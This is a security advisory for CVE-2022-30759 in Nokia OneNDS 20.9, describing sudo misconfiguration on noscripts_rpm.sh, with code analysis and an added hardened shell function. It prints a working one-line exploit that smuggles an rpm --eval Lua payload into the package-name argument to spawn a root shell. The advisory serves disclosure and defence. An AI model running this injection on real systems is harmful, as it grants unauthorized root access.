Nokia OneNDS 20.9 Insecure Permissions / Privilege Escalation

Nokia OneNDS 20.9 has loose sudo permissions that can allow users to escalate privileges.

Packet Storm
===============================================================================
             title: Incorrect Permission Assignment
           product: Nokia OneNDS 20.9
vulnerability type: Security Misconfiguration
          severity: High
        CVSS Score: 7.8
       CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
          found on: 04/05/2022
                by: Giacomo Sighinolfi <[email protected]>
               cve: CVE-2022-30759
===============================================================================

Some sudo permissions can be exploited by some users to escalate to root
privileges and execute arbitrary commands on the system.

The affected users are:
  Provgw, notifs, dbmrun (system users)

They can run the following script as root:
  /opt/cntdb/bin/noscripts_rpm.sh

It can be exploited with:
  sudo /opt/cntdb/bin/noscripts_rpm.sh force-erase "--eval '%{lua:os.execute(\"/bin/sh\")}'"

===============================================================================
  Detailed analysis:

The script accepts as its first argument one of these options:
  install|update|fallback|erase|test-install|test-update|test-erase|
  force-install|force-update|force-erase
and as its second argument an arbitrary rpm package name.

If we analyze the switch case code block (row 175), we can see how the first
argument influences the execution of the script.

175. case "$1" in
…
224.   test-erase)
225.         TEST_OPTION="--test"
226.         OPTION="-e"
227.      ;;
…
238.   force-erase)
239.         TEST_OPTION="--nodeps"
240.         OPTION="-e"
241.      ;;
…

When “force-erase” or “test-erase” is the first argument, the script sets the
“OPTION” variable to “-e”. That value allows us to trigger a privilege
escalation by exploiting the rpm command (row 254) with a particular rpm
package name passed to the script as the second parameter.

…
252. if [ $OPTION == "-e" ]
253. then
254.   rpm $OPTION --noscripts $TEST_OPTION $2
…
===============================================================================
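A hardened form of the erase branch at rows 252-254, as an added example (not Nokia's code and not part of the advisory). The names is_safe_pkg_name, erase_pkg and RPM_BIN are hypothetical, and the allow-list of package-name characters is an assumption. It rejects any second argument that is not a plain package name, quotes it, and ends option parsing with "--" so it can never reach rpm as an option such as --eval.

```shell
#!/bin/sh
# Added example: validate and quote the package name before it reaches rpm.
LC_ALL=C; export LC_ALL   # make the character ranges below byte-exact

# Succeeds only for names built from an assumed allow-list of characters
# that start with a letter or digit (so never with "-").
is_safe_pkg_name() {
    case "$1" in
        '')                 return 1 ;;  # empty
        [!A-Za-z0-9]*)      return 1 ;;  # option-like or odd first character
        *[!A-Za-z0-9._+-]*) return 1 ;;  # spaces, quotes, %, {, } and the rest
    esac
    return 0
}

# erase_pkg MODE PKG: covers the two modes quoted in the advisory.
# RPM_BIN is a hypothetical override so the function can be exercised
# on a machine without rpm; it defaults to the real rpm binary.
erase_pkg() {
    mode=$1
    pkg=$2
    case "$mode" in
        test-erase)  extra="--test" ;;
        force-erase) extra="--nodeps" ;;
        *) echo "unsupported mode: $mode" >&2; return 2 ;;
    esac
    if ! is_safe_pkg_name "$pkg"; then
        echo "rejected package name" >&2
        return 3
    fi
    # Every expansion is quoted, so PKG stays a single argv entry, and
    # "--" tells rpm's option parser that no further options follow.
    "${RPM_BIN:-rpm}" -e --noscripts "$extra" -- "$pkg"
}
```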

Related news

CVE-2022-30759: Nokia OneNDS 20.9 Insecure Permissions

In Nokia One-NDS (aka Network Directory Server) through 20.9, some Sudo permissions can be exploited by some users to escalate to root privileges and execute arbitrary commands.